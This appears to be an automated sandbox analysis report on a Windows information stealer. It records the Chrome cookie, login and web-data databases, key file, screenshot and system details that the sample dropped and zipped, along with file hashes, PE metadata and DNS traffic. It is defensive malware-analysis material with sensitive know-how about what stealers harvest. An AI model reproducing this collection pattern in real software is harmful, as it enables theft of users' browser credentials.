                                          C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\files_\_Chrome\default_cookies.db
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.7006690334145785
                                          Encrypted:false
                                          SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                          MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                          SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                          SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                          SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                          Malicious:false
                                          Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\files_\_Chrome\default_key.bin
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):32
                                          Entropy (8bit):4.9375
                                          Encrypted:false
                                          SSDEEP:3:Tydsb5i6Dn:qqi6D
                                          MD5:18962F5697042F84578AC7F855F38AC5
                                          SHA1:3D7CC906C6F649EEBF0E0EBEC809B89B584033E1
                                          SHA-256:7DDBE41709AE056CDAD2E15C357500D6E5BEBE27D8A708C4069D8C6863A5BE99
                                          SHA-512:36F5BFEF91BFB07D2A45CFCA5D57126B6D2DCD05BE17AFF40E04B5F1EBB8E1D51A4584BA8F1F3326CA592D9A4D63E13A12C125674ECE0B052EED7B11C52AFF1D
                                          Malicious:false
                                          Preview: ...*@.0n...PNI~.o.O......M+.YA
                                          C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\files_\_Chrome\default_logins.db
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.792852251086831
                                          Encrypted:false
                                          SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                          MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                          SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                          SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                          SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                          Malicious:false
                                          Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\files_\_Chrome\default_webdata.db
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                          Category:dropped
                                          Size (bytes):73728
                                          Entropy (8bit):1.1874185457069584
                                          Encrypted:false
                                          SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                          MD5:72A43D390E478BA9664F03951692D109
                                          SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                          SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                          SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                          Malicious:false
                                          Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\files_\screenshot.jpg
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                          Category:dropped
                                          Size (bytes):78831
                                          Entropy (8bit):7.847850529153669
                                          Encrypted:false
                                          SSDEEP:1536:IcAB4J5qfo2hlbsuveVJif3uiicy74xXSdNSnJ55d4U7JK:1Ao5qg7OfexcyBdNi3Lt7JK
                                          MD5:F389B7CB3170C577214F0674A6FAD6D9
                                          SHA1:FC1ABCF8252A6DFB8493F08C495D88639960703E
                                          SHA-256:2F0FD80B1057549F47F3A27C1C2DAE1B230C4A9C5C71F81C6D24FC559DDD6242
                                          SHA-512:9C4C740423336897488156EE014E755F446EE7CC3A5FB263027D5F1CDBA16BF211DC0B98B7A85B42709320A7D3F6A73012DDD2421553B3DFD3BEB925961E80C8
                                          Malicious:false
                                          Preview: ......JFIF.....`.`.....C................%.....- ".%5/874/43;BUH;?P?34JdKPWZ_`_9Ghog\nU]_[...C.......+..+[=4=[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..E-.(...(..U..K2..,p$s.~...*.:-.|.+.......6.Y.t....X..s...r6.\..?....I..a..~dQ..cQS..\....^0z.8?C...D.E-..JJZJ.%%v.|>d8:.......SG.....O.. ..U..T{.f..}.2.......S..%...*./....qm...+G....3...Z.4.&P.w ..+R..(...+..?.t.kO...'g.].U..I..+.e......._.._..i?...........4W}...........q...h=..\..F..J...z..$.j.i)M...E-..J+O.vp.......V*..v5....?.._..i9$5..OEz.. z.........
                                          C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\files_\system_info.txt
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
                                          Category:dropped
                                          Size (bytes):20462
                                          Entropy (8bit):3.5211663508533486
                                          Encrypted:false
                                          SSDEEP:384:Dq8UOpGQGXJ0eDcDDfZmEiv5bJtWmGu37mx1FqGbUpYR6PWhBzR6em7HQCV1Faob:DOOpR2J0eDcDDfZmEiv5bJtWmGu37mxw
                                          MD5:875AD312B785EF11D73066B85DBA49CD
                                          SHA1:1E6E26CE75CE9D66448E3C339C054ABB18DA56BE
                                          SHA-256:06008DED2AD0A3311698E1DE2D371F2C475A7EB02D120168D15C1E18B19CF106
                                          SHA-512:6CD26F5514CBCACE3203AA569B400492FF1CCFE85AEBC1CBAD6CF21A6B6295B6F7B28111FF3F9807AEDF42532079F30F466B43F13CBFA27D136F807EC5722BA3
                                          Malicious:false
                                          Preview: ..S.t.a.r.t. .B.u.i.l.d.:. . . . . . . . . . . . . .C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.D.e.s.k.t.o.p.\.f.i.l.e...e.x.e.....O.S.:. . . . . . . . . . . . . . . . . . . . . . .W.i.n.d.o.w.s. .1.0. .P.r.o. . . .6.4.-.b.i.t._.(.x.6.4.). . . .B.u.i.l.d.:. .1.7.1.3.4. . . .R.e.l.e.a.s.e.:. .1.8.0.3.....O.S. .L.a.n.g.u.a.g.e.:. . . . . . . . . . . . . .e.n.-.U.S.....K.e.y.b.o.a.r.d. .L.a.n.g.u.a.g.e.s.:. . . . . . .E.n.g.l.i.s.h. .(.U.n.i.t.e.d. .S.t.a.t.e.s.). .|. .....L.o.c.a.l. .D.a.t.e. .a.n.d. .T.i.m.e.:. . . . . .2.0.2.1.-.1.0.-.1.3. .0.4.:.4.1.:.0.8.....U.T.C.:. . . . . . . . . . . . . . . . . . . . . .+.0.2.0.0.....U.s.e.r.N.a.m.e. .(.C.o.m.p.u.t.e.r.N.a.m.e.).:. .j.o.n.e.s. .(.2.8.4.9.9.2.).....C.P.U.:. . . . . . . . . . . . . . . . . . . . . .I.n.t.e.l.(.R.). .C.o.r.e.(.T.M.).2. .C.P.U. .6.6.0.0. .@. .2...4.0. .G.H.z. .(.C.o.r.e.s.:. .4.).....T.o.t.a.l. .R.A.M.:. . . . . . . . . . . . . . . .8.1.9.1. . .M.B.....G.P.U.:. . . . . . . . . . . . . . . . . . . . . .A.M.D. .(.A.T.I.). . .F.i.r.
                                          C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\tNdQlntdrTxEwt.zip
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:Zip archive data, at least v2.0 to extract
                                          Category:dropped
                                          Size (bytes):80867
                                          Entropy (8bit):7.9957283100170224
                                          Encrypted:true
                                          SSDEEP:1536:ibCC8yErmu2qlHHMdw3kt6sq+RDAYZJsg32AUSh:OmyEau2qZMkz8cSh3mw
                                          MD5:470E7138C9C8FB931183D340A0D92BDE
                                          SHA1:423CB343F6CF3BF452A44C435AE9151B76C6BBA3
                                          SHA-256:E832A236BA8E8B7F74A6F0824F5623F231F9EE226AC248589CD2DE5ECDF4573D
                                          SHA-512:9180C7FEFC4BCCD7014483AB9C3558FFA85E91A117AB005E90C7EF1BDDB6D763B7E4066EAAC2A7F31DE12AF55648026C2D6222C63F40206C74103BA6DC78BA3F
                                          Malicious:false
                                          Preview: PK.........;>Q.........P......_Chrome/default_cookies.dbUT....3t_s4fas4fa.p...N.ZM.(IjZ.X.[6.@.yc..X...Mx..y...GoD..q.+.5.qS...../cp.=..gy..pJ.+.{.hs9..K..t.y.J...D?wO...x.PpXu..........b+.rr..)..U..<.W.FRC.?0...w..5[...pv..O.[.......~y.?..@.q.gIRu.....H..x.'...(:.B."..B_..T.`...x.N.$kOs..&IC.~....^..v.....]...u.....p..P.......Te.#eyl...>.l.B.+.:....>..RFOk...<n....C>..L...n....s...p.Mn....w.....g..%..F...%..*|?e...=u.E$...wx.0.....>...H.J.t..T...Qs..fs.8..v.i+~..*z.u(..8y..&.Q.2"a....'.;......."....`.N.%.g.oVs.../2..hhi.^..9...q.TF..h%.^.2o..G.`:.....N.*.._]....&$..z?P..bO0 ..Y.=.<..AW..3.r..Dp.P;rqu...{.<.....%.LX_.........l..iY.:......u ,$52S....}HJ..g.g?.[/s....)....k.L8......t.R...b.d.......14w...3.-..g..Kt.D...^....xY.... .J.yBG.......'.$..~...|.vM..J...Y.bl..9.e..d..I..D.x.K.")..I...u..xd/M.)e....r.A.....l.9...2._5... ..\'Als.[K4........L.o(..k.-&`..q.$.. .*..E..e\...../...Z|......N.6.I{<..!.arhJ..;...>Zp...<......C'..C%.u'..0lR. k..~.Y

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):6.549254081960864
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:file.exe
                                          File size:433664
                                          MD5:6738381ddd3d2952312af2a0f2be5157
                                          SHA1:40fa53df583e9b598bb2d7be716958b1f5bad0dc
                                          SHA256:84f4e2b346b6f5473e2c564a6f60985c5d20f621e70a982e9aafd21354ccc66f
                                          SHA512:cf9e7f0ce2a58717d2a46983c75bfffb2ea102ec47d6a8a9c0bd609dd232b5a985918b4faa252bddccfd5197eab0c0fc5aa7e5aaa9c8bc1c6e87e05d98926ed9
                                          SSDEEP:12288:fnp8alT211jBY5nqtMIfHC3XFySjwL4lJELjgChvMN:fp322RIfHqESj7N0M
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2&.tvG.'vG.'vG.'.1Q'mG.'.1d'DG.'.1e'.G.'.?\'sG.'vG.'.G.'.1`'wG.'.1U'wG.'.1R'wG.'RichvG.'................PE..L...J.._...........

                                          File Icon

                                          Icon Hash:9066e198e6673142

                                          Static PE Info

                                          General

                                          Entrypoint:0x433280
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                          DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                          Time Stamp:0x5F12B24A [Sat Jul 18 08:26:50 2020 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:5
                                          OS Version Minor:1
                                          File Version Major:5
                                          File Version Minor:1
                                          Subsystem Version Major:5
                                          Subsystem Version Minor:1
                                          Import Hash:596565906d53e0788494497e755c2e29

                                          Entrypoint Preview

                                          Instruction
                                          mov edi, edi
                                          push ebp
                                          mov ebp, esp
                                          call 00007F9440A51D7Bh
                                          call 00007F9440A4B4D6h
                                          pop ebp
                                          ret
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          mov edi, edi
                                          push ebp
                                          mov ebp, esp
                                          push FFFFFFFEh
                                          push 00451380h
                                          push 00437600h
                                          mov eax, dword ptr fs:[00000000h]
                                          push eax
                                          add esp, FFFFFF98h
                                          push ebx
                                          push esi
                                          push edi
                                          mov eax, dword ptr [00453094h]
                                          xor dword ptr [ebp-08h], eax
                                          xor eax, ebp
                                          push eax
                                          lea eax, dword ptr [ebp-10h]
                                          mov dword ptr fs:[00000000h], eax
                                          mov dword ptr [ebp-18h], esp
                                          mov dword ptr [ebp-70h], 00000000h
                                          lea eax, dword ptr [ebp-60h]
                                          push eax
                                          call dword ptr [00401118h]
                                          cmp dword ptr [016C4D4Ch], 00000000h
                                          jne 00007F9440A4B4D0h
                                          push 00000000h
                                          push 00000000h
                                          push 00000001h
                                          push 00000000h
                                          call dword ptr [00401114h]
                                          call 00007F9440A4B653h
                                          mov dword ptr [ebp-6Ch], eax
                                          call 00007F9440A52CABh
                                          test eax, eax
                                          jne 00007F9440A4B4CCh
                                          push 0000001Ch
                                          call 00007F9440A4B610h
                                          add esp, 04h
                                          call 00007F9440A4FA38h
                                          test eax, eax
                                          jne 00007F9440A4B4CCh
                                          push 00000010h
                                          call 00007F9440A4B5FDh
                                          add esp, 04h
                                          push 00000001h
                                          call 00007F9440A4F763h
                                          add esp, 04h
                                          call 00007F9440A52C1Bh
                                          mov dword ptr [ebp-04h], 00000000h
                                          call 00007F9440A527FFh
                                          test eax, eax

                                          Rich Headers

                                          Programming Language:
                                          • [LNK] VS2010 build 30319
                                          • [ASM] VS2010 build 30319
                                          • [ C ] VS2010 build 30319
                                          • [C++] VS2010 build 30319
                                          • [RES] VS2010 build 30319
                                          • [IMP] VS2008 SP1 build 30729

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x51eb40x3c.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x12c60000x7308.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x12ce0000x1c7c.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x12300x1c.text
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2f1900x40.text
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x519b40x51a00False0.694319486983data7.34053606656IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .data0x530000x1272d500x1c00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .rsrc0x12c60000x73080x7400False0.417362607759data4.44908718493IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x12ce0000xeeee0xf000False0.101676432292data1.28829968487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_ICON0x12c62b00xea8dataEnglishUnited States
                                          RT_ICON0x12c71580x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 12048293, next used block 8159857EnglishUnited States
                                          RT_ICON0x12c7a000x6c8dataEnglishUnited States
                                          RT_ICON0x12c80c80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                          RT_ICON0x12c86300x25a8dataEnglishUnited States
                                          RT_ICON0x12cabd80x10a8dataEnglishUnited States
                                          RT_ICON0x12cbc800x988dataEnglishUnited States
                                          RT_ICON0x12cc6080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                          RT_STRING0x12ccc180x6acdataDivehi; Dhivehi; MaldivianMaldives
                                          RT_STRING0x12cd2c80x3eAmigaOS bitmap fontDivehi; Dhivehi; MaldivianMaldives
                                          RT_GROUP_ICON0x12cca700x76dataEnglishUnited States
                                          RT_VERSION0x12ccae80x130dataDivehi; Dhivehi; MaldivianMaldives

                                          Imports

                                          DLLImport
                                          KERNEL32.dllUnregisterWait, FindFirstChangeNotificationW, InterlockedDecrement, CompareFileTime, SetFirmwareEnvironmentVariableA, GetSystemWindowsDirectoryW, AddConsoleAliasW, FlushViewOfFile, GetPrivateProfileStringW, GetSystemWow64DirectoryA, CreateActCtxW, GetSystemTimes, GetDriveTypeA, LoadLibraryW, _hread, SetSystemTimeAdjustment, GetVersionExW, VerifyVersionInfoA, GetModuleFileNameW, GetEnvironmentVariableA, lstrlenW, SetThreadPriority, GetStartupInfoA, IsDBCSLeadByteEx, GetCurrentDirectoryW, GetLongPathNameW, SetLastError, GetProcAddress, SetVolumeLabelW, CreateTimerQueueTimer, GetConsoleDisplayMode, SearchPathA, OpenMutexA, ProcessIdToSessionId, LocalAlloc, IsSystemResumeAutomatic, AddAtomW, SetCurrentDirectoryW, SetFileApisToANSI, WriteProfileSectionW, AddAtomA, HeapWalk, FindAtomA, GetModuleFileNameA, CreateIoCompletionPort, GetModuleHandleA, GetProcessShutdownParameters, QueryMemoryResourceNotification, FreeEnvironmentStringsW, VirtualProtect, CompareStringA, OutputDebugStringA, GetCPInfoExA, DeleteFileA, CloseHandle, CreateFileW, InterlockedIncrement, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, DecodePointer, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, GetCommandLineA, HeapSetInformation, GetStartupInfoW, RaiseException, GetModuleHandleW, ExitProcess, GetLastError, WriteFile, GetStdHandle, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, HeapValidate, IsBadReadPtr, TlsAlloc, TlsGetValue, TlsSetValue, GetCurrentThreadId, TlsFree, WriteConsoleW, GetFileType, OutputDebugStringW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, HeapCreate, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, RtlUnwind, HeapAlloc, HeapReAlloc, HeapSize, HeapQueryInformation, HeapFree, MultiByteToWideChar, LCMapStringW, GetStringTypeW, SetFilePointer, GetConsoleCP, GetConsoleMode, SetStdHandle, FlushFileBuffers
                                          USER32.dllGetMessageTime

                                          Version Infos

                                          DescriptionData
                                          Translation0x0150 0x0468

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States
                                          Divehi; Dhivehi; MaldivianMaldives

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          10/13/21-03:21:02.389161ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:21:07.457891ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:21:12.695170ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:21:14.200415ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:21:14.984804ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:21:19.954612ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:21:21.183279ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:21:22.913073ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:21:28.288693ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:21:30.426520ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:21:31.997254ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:21:37.881751ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:21:39.010380ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:21:43.851296ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:21:45.854525ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:21:50.210955ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:21:52.137066ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:21:56.197744ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:22:00.995929ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:22:05.278378ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:22:10.380976ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:22:11.515795ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:22:13.811274ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:22:19.217307ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:22:24.750132ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:22:30.705504ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:22:32.411972ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:22:34.170781ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:22:39.874576ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:22:41.081108ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:22:42.795458ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:22:45.078603ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:22:46.003920ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:22:49.749987ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                          10/13/21-03:22:54.398039ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8

                                          Network Port Distribution

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 13, 2021 03:21:00.244450092 CEST4925753192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:01.308037996 CEST4925753192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:01.583400011 CEST53492578.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:02.389056921 CEST53492578.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:04.875261068 CEST6238953192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:05.885540009 CEST6238953192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:05.974519968 CEST53623898.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:07.457341909 CEST53623898.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:10.324683905 CEST4991053192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:11.339392900 CEST4991053192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:11.700870991 CEST53499108.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:11.837393045 CEST5585453192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:12.694979906 CEST53499108.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:12.839085102 CEST5585453192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:13.886396885 CEST5585453192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:13.898669958 CEST53558548.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:14.200314045 CEST53558548.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:14.984724045 CEST53558548.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:17.879841089 CEST6315353192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:18.886455059 CEST6315353192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:18.955882072 CEST53631538.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:19.066164017 CEST5299153192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:19.952100992 CEST53631538.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:20.106025934 CEST5299153192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:20.366436005 CEST53529918.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:20.515779972 CEST5370053192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:21.183137894 CEST53529918.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:21.544275999 CEST5370053192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:21.881818056 CEST53537008.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:22.912961960 CEST53537008.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:25.910090923 CEST5172653192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:26.934092045 CEST5172653192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:27.011250019 CEST53517268.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:27.128180981 CEST5679453192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:28.137290955 CEST5679453192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:28.199316978 CEST53567948.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:28.288079023 CEST53517268.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:28.338900089 CEST5653453192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:29.217339993 CEST53567948.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:29.341252089 CEST5653453192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:29.749722958 CEST53565348.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:29.861408949 CEST5662753192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:30.426400900 CEST53565348.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:30.903583050 CEST5662753192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:30.939423084 CEST53566278.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:31.997054100 CEST53566278.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:35.692908049 CEST6172153192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:36.700745106 CEST6172153192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:36.781883001 CEST53617218.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:36.926614046 CEST5504653192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:37.881616116 CEST53617218.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:37.936988115 CEST5504653192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:37.987848997 CEST53550468.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:39.009149075 CEST53550468.8.8.8192.168.2.4
                                          Oct 13, 2021 03:21:41.521255970 CEST5917253192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:42.544794083 CEST5917253192.168.2.48.8.8.8
                                          Oct 13, 2021 03:21:42.901144028 CEST53591728.8.8.8192.168.2.4
